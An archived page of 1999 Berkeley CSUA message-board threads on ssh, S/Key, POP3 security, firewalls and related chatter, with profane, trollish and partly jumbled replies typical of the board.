| WIKI | FAQ | Tech FAQ | |
 http://csua.com/feed/ | |
| ||||||
| 11/23 |
| 1999/9/28 [Computer/SW/Security] UID:16610 Activity:high |
9/27 Anyone successfully installed ssh on FreeBSD 3.3?
\_ just copy the binaries straight from soda.
\_ sh ./configure ; make ; make install ; ssh-keygen ; ssh http://blah.com
\_ cd /usr/ports/security/ssh; make install; make clean
\_ it didn't work on my sys. Something about rsaref not
able to compile. How do I update the ports list?
\_ use the source luke. |
| 1999/9/20-21 [Computer/SW/Security, Computer/Networking] UID:16556 Activity:high |
9/19 What is in.identd (running on port 113 (auth))? man isn't very
clear on importance of the service.
\_ T3 = 28xT1
\_ From identd(8):
identd is a server which implements the TCP/IP proposed
identd is a server which implements the TCP/IP proposed
standard IDENT user identification protocol as specified
in the RFC 1413 document.
READ THE FUCKING RFC TWINK! --not tom
READ THE FUCKING RFC TWINK! --not tom
\_ "READ THE FUCKING RFC. I'M A FUCKING ASSHOLE."
Grow up you fucking brat.
\_ could this be the reason why .shost authentication doesn't work
if you have this service turned off?
\_ It's there to buxt the not-so-elite h4ckurz!!!!1
\_ ssh does not use identd. Turn it off, it's annoying. -tom
\_ it does if linked against a libwrap.a that does
rfc 1413 lookups by default.
\_ negligible, given that there is a lot more tightly coupled
copper wiring in the electrical cords, house wiring, etc.,
constant of the insulators. |
| 1999/9/20-21 [Transportation/Car, Computer/SW/Security] UID:16553 Activity:low |
9/18 anyone have a car and want a decent cassette deck?
let me know... - danh
\_ Boosting car stereos again danh?
\_ could this be the reason why .shost authentication doesn't work
if you have this service turned off?
\_ It's there to buxt the not-so-elite h4ckurz!!!!1
\_ ssh does not use identd. Turn it off, it's annoying. -tom
\_ it does if linked against a libwrap.a that does
rfc 1413 lookups by default. |
| 1999/9/18-21 [Computer/SW/Security, Computer/SW/Unix] UID:16547 Activity:kinda low 77%like:16544 |
9/16 How do I pipe to an rsh? Say I want to do
sort file | rsh machine -l user cat > file.sort
\_ Exactly like that. If it doesn't work for you, what error
message do you get?
\_ Wanna get rid of 20 lbs of ugly fat real fast? Go in for a
decapitation.
\_ You might want to make sure you can rsh commands first. I generally
\_ Use ssh instead of rsh.
test with something llightweight like 'rsh remotemachine -l
remoteuser whoami' first. -ERic
\_ so your answer is? Just do plain exercise and hope that the
fat around your abs goes away?
\_ s/rsh/ssh/g
\_
Assuming you have rsh set up properly do something like
sort file | rsh machine -l user "cat > file.sort"
or
sort file | rsh machine -l user dd of=file.sort
-ERic |
| 1999/9/18-21 [Computer/SW/WWW/Browsers, Computer/SW/Security] UID:16546 Activity:low 61%like:16538 |
9/16 Thinking about getting a text pager (one where I can forward from
these pagers and service cost? Thanks.
\_ Bless you! Lynx with SSL rocks.
\_ Fat Whacker!
\_ Exactly like that. If it doesn't work for you, what error
message do you get?
\_ Please rewrite this in English and I will try and answer.
\_ Me speaky perfect goodly engrish so you fuck my mother!!! |
| 1999/9/15-17 [Computer/SW/Security, Computer/SW/Unix] UID:16526 Activity:moderate |
09/15 how would u transfer email addresses from an access database to a
majordomo listserver every day? - turin (ie: ftp? or something else
kewl i am missing?)
\_ how do you automatically upload a file without being prompted
with username and password via ftp?
\_ .netrc . I wouldn't recommend it, though. --dim
\_ pirate. way to go!!
\_ The Man is watching.
\_ scp. |
| 1999/9/15 [Computer/SW/Security] UID:16519 Activity:high |
9/13 So once again, does anyone know the side effects of dexadrine?
- oh and yes, bitch, I am CVSing this motd.
\_ Whats the point of cvs'ing a single file? -ERic (who has been
rcs'ing the motd for months now)
\_ Whats the point of cvs'ing a single file? -ERic
\_ I know what this does (send me porn passwords), but can someone
give a formal definition of what is going on here?
\_ is your ADD so bad you can't do a web search for dexadrine and
side effects?
\_ I don';t have add you stupid fuckin gmororn.` and if you
can't understand why I'm taking it then get the fuck out
of the machine.csua you've been calling your world.
\_ Everything in here is wrong except the bits about
"gmororn", "this", and "porn". |
| 1999/9/9 [Computer/SW/Security] UID:16488 Activity:nil |
9/9 http://www.rouze.com (came out a bit early) |
| 11/23 |
| 1999/9/6 [Academia/Berkeley/CSUA, Computer/SW/Security] UID:16471 Activity:nil |
9/6 I have lists of student ID numbers I want to verify. Does Berkeley
have some kind of service that lets me do this on a regular basis.
(How does CSUA check SID against names or can someone just fill out
a fake account form)?
\_ http://regssl.berkeley.edu --jon |
| 1999/9/3-5 [Computer/SW/Security] UID:16458 Activity:moderate |
9/3 They're out there watching you:
http://www.cnn.com/TECH/computing/9909/03/windows.nsa
\_ Either MS was trying to please the DOJ to ease itself from the
antitrust case, or it was simple an unintentional bug.
\_ UNINTENTIONAL BUG? Jeeez, how stupid are you?
WHy do you think microsoft "easily" got through various
crypto regulations, when everyone else is fighting
nasty battles?
\_ Hey, fuckhead: don't go selectively erasing replies.
Particularly, on-topic, and ACCURATE replies.
To repeat:
How the hell can it be "unintentional".. you don't
"accidentally" distribute something with an additional
key that can unlock everything. It was deliberately
put in. Anyone with a CLUE would realise this was to
get NSA/government approval for their crypto API stuff.
In fact, anyone with a clue would have realized this
the minute they heard that MS got their crypto API
'approved' a year ago or whatever. EXPORTABLE.
This violates ITAR, without a back door!
\_ see also http://www.cryptonym.com/hottopics/msft-nsa.html
What I'm wondering is what MSFT gets in return? Think they cut
some deal with our buddies in the NSA?
\_ it's all about th "__NSAKEY" reference
\_ Read some of the rank 5 posts on /. for clue which you won't find
here. |
| 1999/9/3 [Computer/SW/Security, Computer/SW/Unix] UID:16456 Activity:high |
9/2 Root decided to turn off ~lwall/bin/mail.pl without notice.
E-mail root and let them know that you are opposed to this change!
\_ it's a great idea. shut up, nickkral -tom |
| 1999/8/30-9/1 [Academia/Berkeley/CSUA/Troll, Computer/SW/Security] UID:16435 Activity:high |
8/30 Is there any possibility that politburo will reconsider their policy
concerning ftp? Too, we are unable to understand why POP3 access is ok
\_ shut up, ikiru
whereas those of us who have a tough time comprehending s/key ftp
have to suffer. Plain text passwds are sent willy nilly via pop are they
not?
\_ Before you can begin to expect consistent policy from CSUA
leadership, you need to exhibit consistent policy with your
margins in the motd
\_ The real answer is that since this is all done on a voluntary basis,
they don't have time to lock down everything at once. Your gripe
that you're being unfairly treated while pop folks are somehow
allowed to continue violating basic security concepts is ill
conceived. Expect that in time *all* of the incredibly lame
services including pop will be either secured or disabled in time.
services including pop will be either secured or disabled.
If the csua was run by full time staff getting paid to do so, I'm
sure this would have happened a long time ago. kudos to root and
any of root's elves who helped for putting in the time required and
biting the bullet from the whiners with zero security clue.
\_ Mikeh and the rest of root staff rock!
off POP3 for the foreseeable future (> 1 year). Turning off POP3
\_ POP3 is cleartext; there will be no solution other than turning
off POP3 for the foreseeable future (> 1 year).
\_ APOP is trivial to implement, and not cleartext. -tom
\_ does APOP work with everyone's favorite GUI mail reader, or
will they be bombarding root@csua with "My Outlook 95 doesn't
work anymore? Is e-mail b0rken?" My assumption was that
widespread conformance to encrypted POP won't happen in < 1
year. In regards to threads below, I eventually foresee
turning off POP3, turning on APOP, and sending a mass e-mail to
all CSUA members informing them of this and pine|elm|etc. and
.forward.
Turning off POP3
\_ no, ED IS!
ED! ED! ED IS THE STANDARD! answer
would piss enough people off of anything I can imagine. POP3
cleartext is THE way to sniff pw's. S/Key and ssh are a)
steps in the right direction, and b) get the userbase accustomed
to security annoyances. The reasoning is suspect, but for me
it's not something to put up a fight about since I believe I
understand the pros and cons. I look forward to non-availability
of POP3 script-kiddie port sniffers. -non-Politburo sodan
\_ Tough shit for the whining pop3 masses. Let them forward their
mail or read it locally. I don't want to see soda broken into
because some pop twits are too lazy to do the right thing.
\_ then get off YOUR lazy ass and find an alternative. Oh,
and PINE is not the answer.
\_ *I* don't have a security problem reading my mail. If
you're one of those whining security clueless pop users,
the problem is yours, not mine. *You* need to find an
answer, not me. Go look at APOP if you simply *must*
use soda as your mail server. I'm not lazy at all. I
already solved this problem for myself years ago, thanks.
\_ Then when i crack your account by sniffing your passwd
and then bring down the internet with my elite hacking
and the blame all falls on you, ! H0P3 U $+!lL (@N Sl33P
@ |\|!6H+...
\_ D00d, th@t p05t3r uz3z 55H! U l00z3!
\_ ED ED IS THE STANDARD!
\_ install unix it will cure cancer and bring you the
magical mystical gold at the end of the rainbow
\_ No, idiot. You can't sniff my password. My pw
never goes out in clear text. You won't be cracking
my pw anytime soon. It's *your* password I don't
want cracked. |
| 1999/8/30 [Computer/SW/Security] UID:16428 Activity:high |
8/29 Hillary involved in Waco fire deaths! http://www.drudereport.com/matt.htm |
| 1999/8/28 [Computer/SW/Unix, Computer/SW/Security] UID:16415 Activity:nil |
8/27 Can I use ssh port forwarding to FTP to soda?
What port do I need connect to at soda?
\_ Yes, but you'll still need to login using S/Key
\_ if you do it right, you do not need s/key
\_How do I do it Right? |
| 1999/8/28-30 [Computer/SW/Security] UID:16410 Activity:nil |
8/27 Does shost use a callback scheme to authenticate the host? I'm
having problems doing an shost login through a firewall. Of course,
I bet all those die hard security people are going to flame me
for using shost now.
\_ try an ssh -v. It may be failing because it's trying to authorize
the client's host key. IIRC, to use shosts, at least with the
config on soda, your client key must be in soda:~/.ssh/known_hosts
\_ Some firewalls don't pass privileged ports properly. Try "ssh -P" |
| 1999/8/26 [Computer/SW/Security] UID:16400 Activity:insanely high |
8/25 Can someone finish this off. I'm trying to get rc.local to
automatically establish a secure tunnel to uclink4 but I can't
seem to get expect to work.
ssh -f -lmyusername -L 143:uctwink4:143 uctwink4 _???_
\_ seems ok to me, but I think it would still require a passwd
unless you use RSA (-i identity file). But I may be
wrong, I'm no guru. -chingon
\_ Where I have a _???_ I had it execute and expect
script like
#!/usr/local/bin/expect -f
expect "password: "
send -- "mypassword\r"
that didn't seem to work. It still asked me for a password
\_ you want expect to spawn ssh instead, because it's
ssh that's asking you for the password.
\_ Then what goes in place of the _???_
\_ try "sleep 1800" (which uclink actually ignores
but which is correct in general and which makes
ssh happy) |
| 1999/8/25-28 [Computer/SW/Security] UID:16394 Activity:nil |
8/25 Does the modified s-key telnet login system use ip identification
to associate user name with challenge offerings? For instance,
if I login with my user name mispelled, the password: prompt
appears without offering an s-key challenge. so my question is
how does skey know when to offer a challenge?
\_ If there is no account with the name you typed, skey can't be
set up for that username, so it can't challenge.
\_ there is so much m, you must rtfm |
| 1999/8/24-26 [Computer/SW/Security] UID:16387 Activity:kinda low |
8/24 I don't understand why ftp is s/key enabled but tons of
folks still pop their mail that is still a big security hole for
the less competent users of soda I believe
\_ Wrapped for the good of the people.
\_ Wrapped with what? tcpwrappers is useless unless you
actually enable some rules.
\_ One step at a time. Secure POP/IMAP methods are being investigated.
\_ Step one should be to THINK ABOUT THE ACTUAL AFFECT
\_ effect.
\_ I don't know if this is enforceable, but I use an SSH tunnel
to soda's IMAP server. That's a possible alternative.
\_ It's trvially enforceable (just have TCP wrappers only
allow connections from localhost. |
| 1999/8/24 [Computer/SW/Security] UID:16385 Activity:nil |
8/23 Someone turn off the POP3 port (110) ? More unneeded security
for the CSUA penitentary?
\_ No, I think it's just hozed. Try mailing root. |
| 1999/8/19-20 [Computer/SW/Security] UID:16348 Activity:high |
8/19 Is it possible to disrupt GPS signal? Can Russians/Chinese send
a satellite that sends false signal?
\-well i guess i am now the gps "expert". well, yes, of course
the system/signal can be disrupted. whether it can be spoofed
is a trickier question ... because that is a detection-evasion
issue. the answer depends on what scenario you are looking at.
there is considered anti-spoofing engineering that has gone into
the system and the protocol/signal design. if you have a more
specific question, i may have a more specific answer. --psb
\_ whatever. zip your pants back up.
\_ Not to mention that the signal is encrypted (PPS) and purposefully
munged (bias in SPS). --dim
\-the question is about a hostile attack [denial/spoof] which
is different from an attack on an encryptions system [which is about
extracting info, not restricting info or false info] so this normal
mode isnt especially relevant. you seem to be getting at the source of
errors. there are a huge number of sources of errors, some of them
mathematical and contrived, other from circumstances [signal quality
where you are, HDOP, etc.] or from nature [ionospheric delay [also
measured in L2 channel]]. SPS bias [called SA] is usually about
100m XY, 150m Z, and 350ns time but this too is varied to limit how
much refining youc an do by long observations in carrier phase mode.
on the L2 [secure channel], in addition to the normal encryption
[P code], there is hardened mode for spoof detection which involves
re-encrypting the L2 signal into Y code ... you need an even higher
clearance for Y than PPS. i will now have to kill all of you. --psb
\_ I was more addressing the "false signal" aspect than the
"interrupt" aspect. Since the signal is encrypted, it would
seem it would be difficult to spoof unless the spoofed signal
used the same encryption algorithm. --dim
\not necessarily. i am not sure if a "playback attack" would
work because time is part of the encoding but in theory you could
record the L2 telementary and just play it back at the wrong time.
i am not sure what recievers would do with that. again it depends
how exotic a scenario you want to envision ... i mean if the russian
can park a mini-black hole next to the SV and slow down the cesium and
rubidinum clocks on the satellite that would work too. i mean yes
your answer acknowledges "there is some security in the system". --psb
\_ A playback attack of this sort is (if it worked) basically a
denial of service attack. I was more referring to an attack
that would result in a diabolical signal skewed from the
original by some known coordinates. It might be possible, but
not easy to do. I agree that denial of service is the simplest
way to go, but it's more obvious and less vile. --dim
\-this is not what is usually considered a DoS. That would be
more analogous to blocking the signal or some other way of preventing
satellite lock. that's a spoof attack. --psb
\_ Semantics. Using a spoof attack to deny service. Depends on
what the original poster meant by "false signal". Of course,
now that I think about it, wouldn't the original signal have
to be jammed in some way first? How would the receivers react
to multiple signals? --dim
\-if i spoof a source address and use this to break into your
machine and i use that to read your resume to find out your home
address and then come over and cut your fingers off, i wouldnt call
that a DoS or a spoof attack. what would you call it? nice account
name. --psb
\_ Dude, chill out on the coffee. You know what I meant and that's
why I used the word "basically". --dim
\-psb ttyPv Aug 10 00:38 (coffeehut.lbl.gov)
\_ So it sounds easy to "disrupt" signal. So how hard can it be for
Milosevich to send out GPS signals? If he had done it from the
beginning, then there wouldn't be any cruise missile right?
\_ Yeah I totally saw this in a movie and like though James Bond was
like really cool with thise Chinese chick and they like you know
figured it out and stopped the bad guy and totally were on the
make so yeah the Russians can probably do it and steal our people
who are out boating and stuff and make them boat to Russia and be
held captive while hiking and stuff so like uh huh nuke 'em before
they take over the GPS because then they could boatjack our navy
and make these really cool ufos the airforce have get confused and
land in China or Russia or Iraq!!!! |
| 1999/8/13-15 [Politics/Foreign/Asia/China, Computer/SW/Security] UID:16312 Activity:kinda low |
8/13 Anyone seen this? I wonder if we could determine if it's for real:
http://www.iacr.org/~iacr/misc/china
I'm trying to find alternate sources of verification. -brain
\_ It's obviously a hoax. No one is going to hand over $300m in gold
because someone found a tablet. It's ridiculous.
\_ i"ve just decyphered it. The text tells of the location of
the Ark of the Covenent
\_ I saw a problem with the date, it says ROC year 1933, but
there's no ROC year 1933. Obviously, it's western year
1933, which is ROC year 22.
\_ Another problem is that the "Hua" character in "Chung Hua Min
Kwo" (Republic of China) is in Simplified character which was
not used in ROC and in present Taiwan. Simplified character
is only used by Communist China which was founded in 1949.
-- yuen
\_ I have discovered the solution to this problem, but the motd is
too small to contain it. -fermat
\_ umm, okay, really I was asking, "I wonder if there are actual
gold bars with valid encrypted data on them, and if so, what
the encrypted message is." The transaction detailed by the
story is actually irrelevant, because, as you say, it's a
sure bet that the account is no longer valid. -brain |
| 1999/8/6 [Computer/SW/Security, Computer/SW/Unix] UID:16264 Activity:high |
8/6 After <DEAD>www.windows2000test.com<DEAD> has gone down 3 times <DEAD>crack.linuxppc.org<DEAD> has yet to do so nor has it been cracked. For any of you intrested, the root password is linuxppc. [not any more it aint] Give it a shot and win a free computer. \_ lemme guess. set up by the same schmuck that put up a target at defcon, running OFF A CDROM DRIVE. If I wasn't too busy,I'm tempted to nail the damn thing myself. But then again, where the hell can I get a "normal" linuxppc account to compile stuff? \_ on your mac \_ Exactly. How many LinuxPPC users out there? Also, I was under the impression that the PPC code was not open source. Is that correct? \_ It can't include Linux kernel sources if it's not "open source" (GPL'ed) \_ Gee, my computer might go down too if STRUCK BY LIGHTNING. \_ Somebody did a traceroute and found that all of the routes up until the machine was still operational. Microsoft claimed that the router failed. It's summer, the weather's good |
| 1999/8/2-3 [Computer/SW/Security] UID:16222 Activity:moderate |
8/1 Anyone taken a look at, or know anyone who has taken a look at the
source for pgp 6.5.1. For some reason i have more faith in the
integrity of the older versions. (Just 'cause i'm paranoid doesn't
mean that they're not out to get me).
\_ What makes you suspicious of 6.5.1?
\_ Old Calvary are suspicious of tanks. It is just because,
back in the day, i was around paranoid types that i trusted
who said PGP had been checked and was o.k. That was
pre pgp_for_windows and pre talk of clipper chips.
\_ I looked at it. Did you see the function in there called
SendKeyAndDataToJanetReno@FBI.GOV??? I was shocked but it's
really in there! No kidding! |
| 1999/8/1-2 [Computer/SW/Security, Computer/SW/Unix] UID:16219 Activity:very high |
8/1 http://istpub.berkeley.edu:4201/bcc/Sept_Oct99/avc.students.html IS&T once again tries to catch up to what student groups have provided for the last 10 years, and only manages to see part of the picture. (Last time, they decided all students needed was e-mail and we got UCLink. Just imagine how screwed up this new file server will be.) \_ soda [21] wc -l /etc/passwd 2501 /etc/passwd Think of how disasterous that would be to provide 30,000 traditional style login acounts on a single computer (not to mention how expensive the hard disk space would be). The fact is that most majors don't require a unix shell account but it would be nice for the common Berkeley student to have some unix experience. Unfortunately costs and needs don't always coincide. \_ Utterly lame! If i'm making $20+/hr being a paralegal or a doctor I don't have the time or the inclination to fiddle around with unix man pages. I am more productive using 1. an interface I'm used to (since I'm not a programmer what do I care about software development) and 2. an interface that supports applications ALL MY COLLEGUES IN _MY_ (not YOUR) FIELD USE. I'd rather spend my time ski-ing or outdoors than fiddling around with .conf files. \_ That's funny. I have time to do my regular school work, fiddle with .conf files, read the fucking man pages, and go skiing. And unix is VERY useful for people not in the CS major. Go ask the people at LBL what they use for physics simulations. \_ dear God, is the bigotry so deep within you that you fail to see the point? The point is that I AM NOT YOU. I DO NOT WANT TO BE LIKE YOU. What if i said I was a pre med student who spend time commuting to various hospitals in the area? That's more than just regular school work. Tell me, is unix helpful in my anatomy class? Is it useful for LabView? is it useful in my philosophy class? Is it useful when I call my girlfriend up and see what time she'd be ready to go see the opera? Climb out of your cubicle, man. \_ idiocy deleted. \_ fascist nazi. What gives you the right to delete people's opinions at your whim? What's next after your ssh tactics? rm -rf people you don't like? my time with my friends or girlfriend than fiddling around with .conf files. - Publius \_ uh, so why do you care if people who are *not* idiots have Unix shell access? You can diddle around with Netscape all you want, regardless. -tom \_ It's about the oppurtunity to do what you want. \_ Why use a single computer? The OCF provided 12,000+ login accounts 5 years ago on a cluster of 1989-era machines (Motorola 68030 & 040 based apollos). As for disk space, that's what IS&T is proposing to do. \_ providing shell access to uclink4, for example, would lower CPU usage (POP is very expensive) and support costs. The support cost argument is bullshit; if you look at the total cost picture, having shell access is much cheaper. What IST means when they say "it costs less" is "it costs US less". -tom \_ IS&T has a history of ignoring reality, tom. you should know that. \_ Support costs go up when idiots start wanting to use shells. \_ I would say, rather, that they ignore campus concerns in favor of doing things which are convenient for them. -tom \_ They should buy a NetApp. \_ NetApp's suck. EMC, dude. \_ lets take this to http://ucb.computing.announce (ucb.computing.discussion would be better but there is no such group ... yet) --jon \_ hence, mail root@agate \_ hence the "... yet" --jon \_ Okay, now lets take this to http://ucb.computing.discussion --jon |
| 1999/7/30-31 [Computer/SW/Security, Computer/SW/OS/Windows] UID:16207 Activity:moderate |
7/29 I have a friend. Or rather, I had a friend. I very recently
killed him. My friend believed he could safely install linux
on a partition on my win95 machine while I slept. The long and
short of the story is that he couldn't, and I now have no DOS
partitions. I don't think any of the data was screwed up, but the
partitions aren't there anymore. Could someone recommend a
utility or two to try to recover some files? -mjm
\_ need more info about your current state. does linux boot up?
if it does you can recover much of the fat32 partition and place
it on some storage medium. try running fips and see what the
partitioning tables look like
\_ where did you bury the corpse?
\_ Linux boots up. The partition table is all jacked. (It's
got the part's that linux created, but there nothing like
what the original were.) I've got FAT16, if that matters.
I do kinda remember what the partition sizes were.
\_ by, the way, it would probably better if you run
/sbin/fdisk and type p to print out the partition table
and post the results on the motd. --jeff
\_ If you would like to backup your dos partition here's
what you do. In the /etc/fstab file and add the entry
/dev/hda1 /mnt/dos vfat defaults 0 0
or something like that. the first field is the device
that your dos partition is on and /mnt/dos is the directory
that you want to mount your dos partition. then issue
the command "mount /dev/hda1" and you can access your dos
partition in /mnt/dos. How you get that drived backed
up is another story. Too complicated?
Try going into your /etc/lilo.conf file. If you're using
RedHat you might have an entry like
other=/dev/hda1
label=dos
table=/dev/hda
If there isn't one add it and run /sbin/lilo. Of course
make sure that /dev/hda1 is where your dos partition is.
Reboot your computer and at the LILO: prompt type "dos"
and it should boot up into Windows. Deleting the linux
\_ Your friend did you a big favor. Its about time you accepted that
Win95 is obsolete and started using the best technology that is
available: Linux 2.2.x. Don't recover your DOS partitions, forget
about the dark side and start living in the future of computing.
partition (I'm not sure why you want to do that) is a
matter of running fips or partition magic and running
fdisk /MBR at the dos prompt. Hope that helps. --jeff |
| 1999/7/23 [Computer/SW/Security] UID:16187 Activity:low |
7/22 Regarding s/key -- is it at all useful to set it up if
I regularly use ssh to login? And if I do set it up, will
I have to use the s/key passwords when I log in via ssh?
\_maybe. will you always have ssh available? setting up skey
only affects telnet and ftp, not ssh.
\_ yes, you'll need S/Key for ftp
\_s/key is a good thing for if you don't have accesst to ssh, or
for some reason like plaintext, one-time, passwords and plaintext
transmission of your session better than a fixed password and an
encrypted session. It helps to read the info you can find on the
web about the two different technologies. But no, you don't have
to use both. |
| 1999/7/22-23 [Computer/SW/Security] UID:16185 Activity:moderate |
7/22 If someone didn't set up s/key (i.e. keyinit) before the 15th,
and now doesn't have access to ssh, is there any way he can set
up s/key?
\_ log into a machine that has ssh, and ssh into soda.
\_ What part of "doesn't have access to ssh" didn't you
understand?
\_ does "someone" have access to a Java-capable browser?
Use http://www.csua.berkeley.edu/ssh
\_ Read the question again. I didn't ask for generating
OTP's. I asked about what to do if 'keyinit' wasn't run
before July 15. Someone like this logs in and does not
get an s/key challenge. Oh yes, and *someone* really is
someone other than me. Moron.
[my rude answer deleted. sorry.]
\_ The answer has nothing to do with generating OTPs. As
the official motd says, a java ssh client is available
at <DEAD>...edu/ssh<DEAD> Try not to be such a fucking jerk the
next time someone tries to post a helpful motd answer --pld
\_ Sorry. I totally blew it reading the answer. My
apologies to whomever gave the answer that I so
stupidly ignored.
\_ Huh? I don't know about s/key and I've never ran "keyinit"
or anything like that. I just downloaded an SSH client and
now I can log in fine. -- yuen
\_ Exactly. I've basically ignored all this S/Key stuff. You
don't *need* it to log in. Or have you ever tried logging
in withOUT whatever this s/key thing is? |
| 1999/7/22-23 [Computer/SW/Unix, Computer/SW/Security] UID:16184 Activity:nil |
7/22 How do you log off those people how are still using a telnet session
since the pre-ssh enforcement period?
\_ The ban is on cleartext passwords. Using telnet is fine. |
| 1999/7/22-23 [Computer/SW/Security] UID:16181 Activity:nil |
7/22 How do you prolong your ssh session such that the server doesn't
automatically log you out? --converted ssh user
/_ dont use keepalives, fixk your firewall, dont uses tcsh autologout |
| 1999/7/20 [Computer/SW/Security, Computer/SW/OS/Windows] UID:16165 Activity:moderate |
7/19 More NT security hole:
http://support.microsoft.com/support/kb/articles/Q221/9/91.ASP
\_ Why do you folks keep posting old MS holes? Subscribe to the
MS security bulletin service and ntbugtraq and be done with it.
\_ B3CUZ L1NUX 1Z TH3 P3RF3CKT 0S W1TH AB0LUT3L3 N0 S3KUR1TY
H0L3S AT ALL, D00D!!1!! TH1Z PRUV3S 1T!!1!!!
\_ Also http://support.microsoft.com/support/kb/articles/Q234/5/57.ASP |
| 1999/7/16 [Computer/SW/Security, Academia/Berkeley/CSUA/Motd] UID:16144 Activity:moderate |
07/15 I don't get s/key... isn't soda supposed to issue an s/key
challenge when I ftp into soda?
\_ You must be this tall to use skey
\_ You have to set up your key first. see man skey(1)
\_ http://soda.CSUA.Berkeley.EDU% man skey(1)
Badly placed ()'s.
\_ You must be this tall to use man
\_ "skey(1)" means to type "man 1 skey" -- it looks up skey
in manual section 1 (user commands). The section number
is optional, but it matters if there are two manpages
with the same name -- for example, printf(1) tells you
about the "printf" command-line utility, but printf(3)
tells you about the C library function.
\_ SONOFABITCH!! I can't believe someone actaully posted
a usefull and non-insulting reply!! Surely the motd
gods will banish you for eternity! You asked for it!
\_ man skey |
| 1999/7/15-16 [Computer/SW/Security, Computer/SW/Unix] UID:16138 Activity:high |
7/14 S/Key is neat-o. It works even if you don't have ssh.
\_ S/Key is useful, but understand that it only protects your _soda_
password. If you connect to soda using telnet and s/key, then
telnet somewhere else and type your ordinary password for that place,
it can be sniffed. ssh is not an annoying frivolity, it is a good
thing; use it if you can. --dbushong
\_ Question (not necessarily rhetorical)- Is giving your password to a
web-based java applet really an improvement over telnet?
\_ Yes, because your password is encrypted before leaving the
machine. (Of course, the csua should put it on an ssl
httpd for the truly paranoid.)
Yeah, yeah, Java is secure, but aren't there ways around that
too?
\_ so download the applet, and install it on your own server.
Then worse case, it could only communicate back to THAT
server. And/or just set your security settings to disallow
applets from making ANY net connections.
\_ So wouldn't it be nice to have an authorized s/key
applet on soda?
\_ http://www.csua.berkeley.edu/skey |
| 1999/7/14-16 [Computer/SW/Security] UID:16133 Activity:high |
7/14 For people whose firewalls allow telnet but not ssh, I set up scotch
to redirect telnet and rlogin (ports 23 and 513) to soda's sshd.
You should now be able to run "ssh -p23 http://scotch.csua.berkeley.edu"
and log in to soda. Thanks to alanc for suggesting this. --mconst
\_ My firewall runs telnet proxy. I couldn't ssh before, but
this works brilliantly. Thanks, guys! -John
\_ note that this wont work if your firewall requires use of a
proxified program to get through the firewall (like say telnet
linked against the socks library)
\_ You can run ssh through socks: use "./configure --with-socks"
when you build ssh. Note that most socks servers will let you
connect directly to soda port 22. If yours doesn't, you should
still be able to use the telnet redirector on scotch. --mconst
\_ runsocks ssh then
\_ note this is not intended as the solution to all ssh/firewall
problems, just one set of them
\_ mconst and alanc, that was a rad solution to the ssh problem!
You guys RULE! -ax
\_ hey, i was the one who came up with having sshd listen to
port 23. i just didn't sign my name on the motd since i
The fact that they implemented it on Scotch ahead of
the switchover is what makes them rule. -ax
didn't know how it would be recieved among nit-picky admins.
\_ I had that idea too. It's logical conclusion to reach.
The fact that they implemented it on Scotch ahed of
the switchover is what makes them rule. -axa
\_ I got credit simply because I MAILED ROOT with the
sugesstion. If you want to get people's attention,
direct e-mail beats anonymous MOTD posts any day. -alan-
\_ maybe i'll sign my motd posts with a pgp signature
next time. :-)
\_ Yeah! mconst for President! mconst and alanc 2000! |
| 1999/7/14-16 [Computer/SW/Security] UID:16131 Activity:moderate |
7/14 When trying to connect to CSUA with F-Secure SSH 2.0.12 build 9 I'm
getting the error "Disconnected;protocol version not supported."
Anyone else get this, any ideas?
\_ you're probably using the wrong protocol. make sure you're using
the right ssh protocols.
\_ I don't get it. Isn't CSUA an entirely non-profit
organization for educational purpose? Why can't we use ssh2?
\_ People won't be able to connect from work.
\_ ssh2 is supposed to be backwards compatible. use the -v flag
next time and post the output.
\_ ssh2 is not backwards compatible. You will need to use an
ssh1 client to connect to soda; we can't run the ssh2 server
because it has a restrictive license.
\_ Tried http://csua.berkeley.edu -v and receive the error "No address
associate with the name" I do not see a place to change the
protocols in F-Secure.
\_ ssh2 is definitely not backwards compatible. -tom
\_ You need F-Secure SSH version 1.something.
\_ And remember, tomorrow you won't be able to post this!
Have fun!
\_ S/Key works just fine. It's a pain in the ass logging
in, but it requires nothing mroe than telnet. |
| 1999/7/14-16 [Computer/SW/Security] UID:16130 Activity:high |
7/14 My company firewall doesn't allow port 22 connection. What should
I do? And getting my ignorant IS management people to open this port
is probably harder than sleeping with their wives. Is there an
alternative way to ssh to soda?
\_ If you find a port that your firewall allows, let us know and
we can probably set up an extra sshd on that port. --mconst
\_ Try the port redirector I just installed on scotch (look three
motd entries up). --mconst
\_ Thanks. It works.
\_ I find it very easy to sleep with IS management's wives.
\_ Everyone who isn't an IS manager does.
\_ .forward your email. Your soda account by default is insecure
since it is run and used by a bunch a hackers.
\_ Huh? How much more off topic could you get?
\_ anyone notice you can telnet to another server and ssh from there?
\_ Anyone notice how this COMPOUNDS the problem? Don't. --sowings
\_ The PROBLEM is that soda isn't allowing telnet any more.
So no, it doesn't compound the problem
\_ Soda allows telnet. It doesn't allow cleartext passwords.
Don't get mad, get clue.
\_everything running over the telnet will be free game, before
it gets encrypted.
\_ that was my point... a mandatory ssh on soda won't
necessarily force people to be safe...
\_ clue time: you can never force people to be safe.
\_ then why mandatory ssh?
\_ cuz smart people will simply download the software
and use ssh on the machine they're sitting at
instead of doing a roundabout telnet into another
machine. which one is more of a hassle?
apparently some people think it's more convenient
to telnet then ssh each time. but then again,
berkeley admits some pretty stupid people.
\_ Worse yet, they give them degrees. |
| 1999/7/12-14 [Computer/SW/Security, Transportation/Bicycle, Computer/SW/OS/Windows] UID:16115 Activity:high |
7/12 a good windows mail client that supports pgp? Wait, i know, RIDE
BIKE, use linux, I DO, but i need *others* to use pgp with and
the others use windows.
\_ Outlook
\_ Outlook? What version? Last v. I tried was complete trash.
\_ ok, pardon my ignorance, but could someone please explain the
connection betwen Linux and RIDE BIKE ?
\_ Guessing: someone is mocking the attitude/mentality of both
groups?
\_ How does that differ from the 50 million "Windoz Rulez,
\_ Who said it differed?
use windows" that also go on the motd, not to mention that
their attitudes and mentality are usually worse. I also
seem to remember a quote, "drive a fucking car you hippie"
posted somewhere on a long ago motd showing taht non-bike
riders are just about as bad.
\_ PGP for Windows (commercial, from NAI) will integrate
well with Eudora Light or Pro. However, Eudora light
tends to corrupt important Windows files and generally
suck. --dbushong
\_ ride bike.
\_ use freebsd.
\_ use linux.
\_ freebsd >> linux
\_ use Motd::Public;
\_ Less filling >> tastes great |
| 1999/7/11-14 [Computer/SW/Security] UID:16104 Activity:low |
7/10 Anyone know if someone has written an SKey generator for the
Palm OS? Would be handy to have the key generator handy...
\_ http://astro.uchicago.edu/home/web/valdes/pilot/pilOTP
